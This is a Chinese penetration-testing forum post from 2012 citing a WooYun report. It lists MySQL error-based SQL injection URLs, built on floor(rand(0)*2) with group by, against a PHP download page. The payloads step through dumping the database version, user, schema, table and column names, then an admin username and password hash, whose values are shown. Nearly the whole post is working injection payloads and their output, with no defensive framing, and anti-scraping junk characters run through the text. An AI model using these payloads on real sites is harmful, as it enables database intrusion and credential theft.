中国网络渗透测试联盟

标题: php+mysql高级爆错注入经测算有效 [打印本页]

作者: admin    时间: 2012-9-13 17:52
标题: php+mysql高级爆错注入经测算有效
http://www.wooyun.org/bugs/wooyun-2010-01666
( s4 @' z6 G4 d9 q) h
1 b# C" |, F" @! f+ _! `/ x$ c之前想找个测试 没想到这有 可以测试下做个记录而已
! N' R. c, K( {9 o9 o8 [/ G  \+ A& k& W8 w' U4 B2 y
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0038 X1 d+ N& P& A2 g! q$ u  A1 r
! a0 M+ ]1 f% y5 L9 w" n7 e# P: F
/data0/htdocs/leqi_new/app/myapp.php
+ n% G$ b" W0 j. u: g) J; {/ c+ F8 E' d; ?+ L
或者
' r1 ~8 {2 t7 D! K( ?: f( g" i6 N& r/ B
/**********version()**********/ 5.1.49-log2 l6 e# ]' |" _+ t
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
" W$ V# m0 ~# z) G. W! y- v+ Y1 m0 C; r. z+ \  t" e, V6 Z' b  B
/**********user()**********/  4 i7 e2 C. o% b  J& H, ]% l
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
# F! n7 B( L! l) }! Y/ E' `: ?; ^2 I0 q
/**********database()**********/  leqi
5 B: w+ N6 |& phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003+ v* q* p, j: Z/ m
0 X1 d! q8 n; k: j4 i9 U
/**********limit依次递归爆库**********/. k# X, z; j# a5 _3 _
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003' T5 T: z  p2 l/ v$ r$ E
information_schema/ h$ X( z* {8 [3 ]
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) c7 ~% K) K1 {+ r( I  a
leqi; Q  N$ S; B: D
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. _% W& }: i* v- O* P& C8 dtest
$ j( E+ ^* ?5 l, @/ z1 q# g' I7 K: s) A+ k5 f
/**********limit依次递归爆表名**********/
+ Y( \) |9 _' @! B5 J; z0 jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) W4 h* |/ l: l$ C
users* Z3 L. @+ ~/ A0 W/ s* x$ c2 E

6 W% d/ k* \" c. q# h/**********limit依次递归爆字段名**********/
5 F  w4 a" a% [+ e9 Q& W0 T# L4 zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
; x1 n+ K5 r) ?+ r, I! ~user_id,username,nickname,passwd,group_id/ L  T4 m+ m8 W: e( k! g
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, u" V; h* U* Z5 A$ h* Y/wapc/5000_0005_0033 z' x% Y. {$ `4 F" [
11 21
  z; S6 ~. E1 b% B8 t0 i% o7 ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
5 Y4 I( y% x! x$ Y( Z# m& O/wapc/5000_0005_003  D8 r# B% `* N8 E0 {: t. X
11 341 351 3617 z" L6 A+ Q; E1 N, Y
/**********爆数据**********// W: b- @  v3 V3 T
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
- X* w' Q. ?0 j6 ^5 J  Hadmin
& P% V  s4 O& F% Y- Lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
# k+ L! Q5 m( _6 q$ u2 m* y- h* @6a8b4574ca231eb8bd52764d4978ffcd7 D, A2 p2 l. }/ n% W) V

8 M3 j$ Y- w) O: t# L / o7 q8 T9 S4 X; {9 X4 s, g3 a





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2